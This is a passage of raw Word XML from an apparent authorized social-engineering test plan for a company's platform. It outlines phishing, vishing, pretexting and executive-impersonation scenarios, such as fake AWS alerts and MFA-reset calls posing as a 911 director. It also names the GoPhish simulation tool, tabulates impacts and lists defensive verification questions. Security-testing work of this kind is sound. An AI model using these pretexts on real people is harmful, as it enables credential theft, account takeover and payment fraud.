        <w:t xml:space="preserve">Social engineering tests must only be conducted by a contracted professional firm with explicit written authorization from NexCort iQ leadership AND written consent from the affected agency if testing extends to agency employees. Internal team members must be notified after the test (not before, to preserve test validity). HR must be briefed before testing begins.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Test whether employees can be manipulated into revealing credentials, granting unauthorized access, or performing actions that compromise platform security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Test Categories</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Phishing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Send crafted emails impersonating a trusted source to capture credentials or deploy a payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario A: Email from 'AWS Security' claiming unusual login activity, linking to a fake AWS console login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario B: Email from 'RC IT Support' requesting the recipient verify their Cognito credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario C: Email from a fake agency customer requesting an urgent account reset</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario D: Spear phish using LinkedIn data about a specific RC engineer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># GoPhish — open-source phishing simulation platform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">gophish</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Configure campaigns, landing pages, and tracking pixels</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Metrics: open rate, click rate, credential submission rate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Vishing (Voice Phishing)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Phone calls impersonating IT support, a vendor, or a law enforcement contact requesting account changes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario: Call RC billing contact claiming to be from 'AWS billing support', request payment method update</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario: Call agency IT admin impersonating RC onboarding team, request they provision a new user account</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario: Call RC ops team impersonating a 911 center director, request emergency password reset without MFA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Pretexting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Build a fabricated scenario to establish trust before extracting information.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario: 'New RC employee' asks an existing engineer for help accessing a system they claim they should have access to</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario: 'Ring certification reviewer' calls to verify account credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Business Email Compromise</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Impersonate an executive to authorize payment changes or access grants.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario: Email appearing to be from the CEO requesting an urgent wire transfer or pricing change</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario: Email appearing to be from the CTO requesting emergency production access for a contractor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">NexCort iQ Specific Social Engineering Risks</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40"/>
        <w:gridCol w:w="1800"/>
        <w:gridCol w:w="5040"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3240"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Attack Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact if Successful</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3240"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Fake AWS security alert → credential capture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">RC engineers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Full AWS account compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="324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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Impersonate RC sales rep → agency installs malware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Agency IT admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="504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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Agency network compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3240"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Fake billing support call → payment redirect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">RC billing contact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Financial fraud</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="324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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Emergency MFA bypass request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">RC ops team</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="504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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Unauthorized account access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3240"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">'New employee' request for production creds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">RC senior engineers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Production system access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Defensive Procedures to Verify</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Does RC have a callback verification procedure before resetting MFA for any user?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Does the billing team have a voice verification process before changing payment instructions?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Is there a documented procedure for handling emergency access requests outside business hours?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Do all employees know to report suspicious calls to security@rapidcortex.us?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
